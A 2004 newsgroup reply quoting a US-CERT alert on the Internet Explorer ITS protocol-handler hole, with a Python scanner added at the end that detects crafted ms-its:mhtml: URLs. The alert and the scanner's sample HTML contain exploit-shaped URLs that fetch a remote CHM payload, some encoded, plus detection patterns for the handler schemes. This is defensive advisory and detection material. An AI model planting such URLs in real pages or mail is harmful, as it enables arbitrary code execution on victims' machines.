Re: US_CERT Technical Cyber Security Alert TA04-099A -- Vulnerability in Internet Explorer ITS Protocol Handler (transcribed)
From: David H. Lipman (DLipman~nospam~_at_Verizon.Net)
Date: 04/09/04
- Next message: Stan: "Re: virus i think"
- Previous message: Bill Sanderson: "US_CERT Technical Cyber Security Alert TA04-099A -- Vulnerability in Internet Explorer ITS Protocol Handler (transcribed)"
- In reply to: Bill Sanderson: "US_CERT Technical Cyber Security Alert TA04-099A -- Vulnerability in Internet Explorer ITS Protocol Handler (transcribed)"
- Messages sorted by: [ date ] [ thread ]
Date: Thu, 8 Apr 2004 20:18:32 -0400
Bill:
I posted the CIAC version Today in Verizon's hierarchy.
BTW: Did/Do you "really" know what Raoul and I were discussing? If you do, drop me an email....
Dave
"Bill Sanderson" <Bill_Sanderson@msn.com.plugh.org> wrote in message
news:%23XQEJYcHEHA.3200@TK2MSFTNGP10.phx.gbl...
| Folks, this won't verify, nor does what I take to be the original received
| by email--check with US-CERT directly for authoritative information.
|
| You may have noticed an increased level of posting of bugbear variants and
| bloodhound.exploit.6 recently.
|
| This is unpatched in IE, active in the wild, and being reported by our
| friends and neighbors, and this alert gives a registry key to work around
| until a patch is available.
|
|
|
| -----BEGIN PGP SIGNED MESSAGE-----
| Hash: SHA1
|
| Vulnerability in Internet Explorer ITS Protocol Handler
|
| Original release date: April 8, 2004
| Last revised: --
| Source: US-CERT
|
| Systems Affected
|
| * Microsoft Windows systems running Internet Explorer
|
| Overview
|
| A cross-domain scripting vulnerability in Microsoft Internet Explorer
| (IE) could allow an attacker to execute arbitrary code with the
| privileges of the user running IE. The attacker could also read and
| manipulate data on web sites in other domains or zones.
|
| I. Description
|
| There is a cross-domain scripting vulnerability in the way ITS
| protocol handlers determine the security domain of an HTML component
| stored in a Compiled HTML Help (CHM) file. The HTML Help system
| "...uses the underlying components of Microsoft Internet Explorer to
| display help content. It supports HTML, ActiveX, Java, [and] scripting
| languages (JScript, and Microsoft Visual Basic Scripting Edition)."
| CHM files use the InfoTech Storage (ITS) format to store components
| such as HTML files, graphic files, and ActiveX objects. IE provides
| several protocol handlers that can access ITS files and individual CHM
| components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. IE also has
| the ability to access parts of MIME Encapsulation of Aggregate HTML
| Documents (MHTML) using the mhtml: protocol handler.
|
| When IE references an inaccessible or non-existent MHTML file using
| the ITS and mhtml: protocols, the ITS protocol handlers can access a
| CHM file from an alternate source. IE incorrectly treats the CHM file
| as if it were in the same domain as the unavailable MHTML file. Using
| a specially crafted URL, an attacker can cause arbitrary script in a
| CHM file to be executed in a different domain, violating the
| cross-domain security model.
|
| Any programs that use the WebBrowser ActiveX control or the IE HTML
| rendering engine (MSHTML) may be affected by this vulnerability.
| Internet Explorer, Outlook, and Outlook Express are all examples of
| such programs. Any programs, including other web browsers, that use
| the IE protocol handlers (URL monikers) could function as attack
| vectors. Also, due to the way that IE determines MIME types, HTML and
| CHM files may not have the expected file name extensions (.htm/.html
| and .chm respectively).
|
| NOTE: Using an alternate web browser may not mitigate this
| vulnerability. It may be possible for a web browser other than IE on a
| Windows system to invoke IE to handle ITS protocol URLs.
|
| US-CERT is tracking this issue as VU#323070. This reference number
| corresponds to CVE candidate CAN-2004-0380.
|
| II. Impact
|
| By convincing a victim to view an HTML document such as a web page or
| HTML email message, an attacker could execute script in a different
| security domain than the one containing the attacker's document. By
| causing script to be run in the Local Machine Zone, the attacker could
| execute arbitrary code with the privileges of the user running IE. The
| attacker could also read or modify data in other web sites (including
| reading cookies or content and modifying or creating content).
|
| Publicly available exploit code exists for this vulnerability. US-CERT
| has monitored incident reports that indicate that this vulnerability
| is being exploited. The Ibiza trojan, variants of W32/Bugbear, and
| BloodHound.Exploit.6 are some examples of malicious code that exploit
| this vulnerability. It is important to note that any arbitrary
| executable payload could be delivered via this vulnerability, and
| different anti-virus vendors may identify malicious code with
| different names.
|
| A malicious web site or email message may contain HTML similar to the
| following:
|
| ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//exploit_chm::exploit_html
|
| (This URL is intentionally modified to avoid detection by
| anti-virus software.)
|
| In this example, HTML and script in exploit.html will be executed in
| the security context of the Local Machine Zone. It is common practice
| for exploit.html to either contain or download an executable payload
| such as a backdoor, trojan horse, virus, bot, or other malicious code.
|
| Note that it is possible to encode a URL in an attempt to bypass HTTP
| content inspection or anti-virus software.
|
| III. Solution
|
| Currently, there is no complete solution for this vulnerability. Until
| a patch is available, consider the workarounds listed below.
|
| Disable ITS protocol handlers
|
| Disabling ITS protocol handlers appears to prevent exploitation of
| this vulnerability. Delete or rename the following registry keys:
|
| HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk}
|
| Disabling these protocol handlers will significantly reduce the
| functionality of the Windows Help system and may have other unintended
| consequences. Plan to undo these changes after patches have been
| tested and installed.
|
| Follow good Internet security practices
|
| These recommended security practices will help to reduce exposure to
| attacks and mitigate the impact of cross-domain vulnerabilities.
|
| * Disable Active scripting and ActiveX controls
|
| NOTE: Disabling Active scripting and ActiveX controls will not
| prevent the exploitation of this vulnerability.
|
| Disabling Active scripting and ActiveX controls in the Internet
| and Local Machine Zones may stop certain types of attacks and will
| prevent exploitation of different cross-domain vulnerabilities.
|
| Disable Active scripting and ActiveX controls in any zones used to
| read HTML email.
|
| Disabling Active scripting and ActiveX controls in the Local
| Machine Zone will prevent malicious code that requires Active
| scripting and ActiveX controls from running. Changing these
| settings may reduce the functionality of scripts, applets, Windows
| components, or other applications. See Microsoft Knowledge Base
| Article 833633 for detailed information about security settings
| for the Local Machine Zone. Note that Service Pack 2 for Windows
| XP includes these changes.
|
| * Do not follow unsolicited links
|
| Do not click on unsolicited URLs received in email, instant
| messages, web forums, or Internet relay chat (IRC) channels.
|
| * Maintain updated anti-virus software
|
| Anti-virus software with updated virus definitions may identify
| and prevent some exploit attempts. Variations of exploits or
| attack vectors may not be detected. Do not rely solely on
| anti-virus software to defend against this vulnerability. More
| information about viruses and anti-virus vendors is available on
| the US-CERT Computer Virus Resources page.
|
| Appendix B. References
|
| * Vulnerability Note VU#323070 -
| <http://www.kb.cert.org/vuls/id/323070>
|
| * US-CERT Computer Virus Resources -
| <http://www.us-cert.gov/other_sources/viruses.html>
|
| * CVE CAN-2004-0380 -
| <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>
|
| * Introduction to URL Security Zones -
| <http://msdn.microsoft.com/workshop/security/szone/overview/overview.asp>
|
| * About Cross-Frame Scripting and Security -
| <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp>
|
| * MIME Type Determination in Internet Explorer -
| <http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp>
|
| * URL Monikers -
| <http://msdn.microsoft.com/workshop/networking/moniker/monikers.asp>
|
| * Asynchronous Pluggable Protocols -
| <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable.asp>
|
| * Microsoft HTML Help 1.4 SDK -
| <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Start.asp>
|
| * Microsoft Knowledge Base Article 182569 -
| <http://support.microsoft.com/default.aspx?scid=182569>
|
| * Microsoft Knowledge Base Article 174360 -
| <http://support.microsoft.com/default.aspx?scid=174360>
|
| * Microsoft Knowledge Base Article 833633 -
| <http://support.microsoft.com/default.aspx?scid=833633>
|
| * Windows XP Service Pack 2 Technical Preview -
| <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.mspx>
|
| * AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>
| _________________________________________________________________
|
| This vulnerability was reported by Thor Larholm.
| _________________________________________________________________
|
| Feedback can be directed to the author: Art Manion.
| _________________________________________________________________
|
| Copyright 2004 Carnegie Mellon University.
|
| Terms of use:
|
| <http://www.us-cert.gov/legal.html>
|
| Revision History
|
| April 8, 2004: Initial release
| -----BEGIN PGP SIGNATURE-----
| Version: GnuPG v1.2.1 (GNU/Linux)
|
| iD8DBQFAdbqQXlvNRxAkFWARAtfuAKD0NGSDWbtITNqXKmZk7qcbJD/h2QCfRlU/
| sWme3VvhRbvk9KjNUNyTsbY=
| =kL0G
| -----END PGP SIGNATURE-----
|
|
|
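Added example, not code from US-CERT or from either poster: a content-inspection scanner for the URL shape the advisory describes (an ITS handler scheme wrapping an mhtml: moniker whose root is an unavailable local file, followed by "!" and the alternate location the CHM is really fetched from, then "::" and the HTML component inside it). It first undoes the HTML character references and percent-encoding the advisory warns can hide such a URL, then pulls the crafted form apart so the local root (the reason script lands in the Local Machine Zone) and the remote CHM source can be reported separately. The four scheme names are the ones the advisory lists; the sample HTML is constructed for this example and keeps the advisory's underscore-modified placeholder file names.

```python
"""Scan HTML or e-mail text for ITS protocol-handler URLs of the kind the
advisory describes, and pull apart the crafted mhtml: form whose root is a
local file that does not exist.  Added example (not US-CERT or poster code)."""
import html
import re
import urllib.parse
from dataclasses import dataclass
from typing import List, Optional

# The four handler schemes the advisory lists.  Longer alternatives first so
# "ms-itss" is not reported as "ms-its" plus trailing text; the lookbehind
# keeps "its" from matching inside "ms-its" or inside an ordinary word.
_SCHEME = r"(?<![\w-])(?P<scheme>ms-itss|ms-its|its|mk:@msitstore)"
_STOP = r"[^\s\"'<>]"  # characters that end a URL inside an attribute or text

# Crafted form: <its scheme>:mhtml:<root>!<where the CHM really comes from>::<component>
_CRAFTED = re.compile(
    rf"{_SCHEME}:mhtml:(?P<root>[^!\s\"'<>]+)!(?P<chm>{_STOP}+?)::(?P<component>{_STOP}+)",
    re.IGNORECASE,
)
# Any ITS-handler URL at all, e.g. a legitimate ms-its: link into a local .chm.
_ANY = re.compile(rf"{_SCHEME}:{_STOP}+", re.IGNORECASE)


@dataclass
class ItsUrl:
    raw: str
    scheme: str
    crafted: bool                    # True for the mhtml: root-fallback form
    root: Optional[str] = None       # the mhtml root (the unavailable local file)
    chm: Optional[str] = None        # alternate source the CHM is fetched from
    component: Optional[str] = None  # HTML component inside that CHM
    local_zone: bool = False         # root is a local path: script runs in Local Machine Zone


def normalize(text: str, rounds: int = 3) -> str:
    """Undo the encodings the advisory warns may be used to slip past content
    inspection: HTML character references and (repeated) percent-encoding.
    Bounded so a pathological input cannot loop forever."""
    out = text
    for _ in range(rounds):
        nxt = urllib.parse.unquote(html.unescape(out))
        if nxt == out:
            break
        out = nxt
    return out


def _is_local_root(root: str) -> bool:
    """file: URLs and drive-letter paths resolve in the Local Machine Zone."""
    r = root.lower()
    return r.startswith("file:") or re.match(r"^[a-z]:[\\/]", r) is not None


def scan(text: str) -> List[ItsUrl]:
    """Return every ITS-handler URL in `text` after normalization: crafted
    mhtml: URLs first, broken into their parts, then any other ITS URL."""
    norm = normalize(text)
    found: List[ItsUrl] = []
    seen = []
    for m in _CRAFTED.finditer(norm):
        seen.append(m.span())
        found.append(ItsUrl(raw=m.group(0), scheme=m.group("scheme").lower(), crafted=True,
                            root=m.group("root"), chm=m.group("chm"),
                            component=m.group("component"),
                            local_zone=_is_local_root(m.group("root"))))
    for m in _ANY.finditer(norm):
        if any(s <= m.start() < e for s, e in seen):
            continue  # already reported as a crafted URL
        found.append(ItsUrl(raw=m.group(0), scheme=m.group("scheme").lower(), crafted=False))
    return found


# Constructed sample page (not a captured exploit): two crafted URLs, one plain
# and one hidden behind an HTML character reference plus percent-encoding, one
# legitimate local help link and one ordinary link.  Placeholder file names
# follow the advisory's intentionally modified example.
SAMPLE_HTML = """<html><body>
<iframe src="ms-its:mhtml:file://C:\\nosuchfile_mht!http://www.example.com//exploit_chm::exploit_html"></iframe>
<a href="&#109;s-its:mhtml:file%3A%2F%2FC%3A%5Cnosuchfile_mht!http%3A%2F%2Fwww.example.com%2F%2Fexploit_chm%3A%3Aexploit_html">help</a>
<a href="ms-its:C:\\WINDOWS\\Help\\example.chm::/example.htm">local help</a>
<a href="http://www.example.com/index.html">ordinary link</a>
</body></html>"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_HTML):
        tag = "CRAFTED" if hit.crafted else "its-url"
        zone = " (Local Machine Zone)" if hit.local_zone else ""
        print(f"{tag}: {hit.scheme} root={hit.root} chm={hit.chm} component={hit.component}{zone}")
```

Both crafted links in the sample decode to the same URL, which is the point of normalizing before matching. The scanner is a filter for mail gateways or proxies, not a fix: as the advisory says, encoding tricks it does not anticipate (for example a URL assembled by script at run time) will get past it, and the only workaround the advisory offers is disabling the handler keys it lists.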